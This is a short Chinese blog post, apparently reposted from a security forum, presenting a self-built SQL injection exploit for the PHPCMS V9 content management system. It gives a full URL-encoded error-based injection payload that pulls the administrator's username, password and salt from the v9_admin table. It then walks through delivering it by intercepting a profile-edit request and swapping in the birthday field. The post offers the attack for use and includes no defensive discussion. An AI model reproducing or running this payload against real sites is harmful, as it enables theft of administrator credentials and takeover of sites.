PHPCMS_V9注入0DAY___EXP已构造

/ 1评 / 0

PHPCMS_V9注入0DAY___EXP

漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.html
EXP构造:haxsscker

土司只给了张烂图- -没给语句……那我就自己构造吧……
本人构造结果如下:
[php]
%60userid%60%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select++%28select+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9%5Fadmin+LIMIT++0%2C1%29%29+from+information%5Fschema%2Etables+limit+0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information%5Fschema%2Etables+group++by+x%29a%29+%2D%2D+
[/php]
利用:

1.首先要注册个帐号
2.然后我们来到会员中心--->账号管理---->修改个人信息
3.生日那里随便选个日期
4.提交--->抓包拦截
5.将birthday替换为我们的EXP,进行提交,就能爆出账号密码

转自:https://forum.90sec.org/thread-4966-1-1.html

一条回应:“PHPCMS_V9注入0DAY___EXP已构造”

  1. 无望说道:

    哇哇哇哇哇哇哇哇哇哇哇哇哇

发表评论

电子邮件地址不会被公开。 必填项已用*标注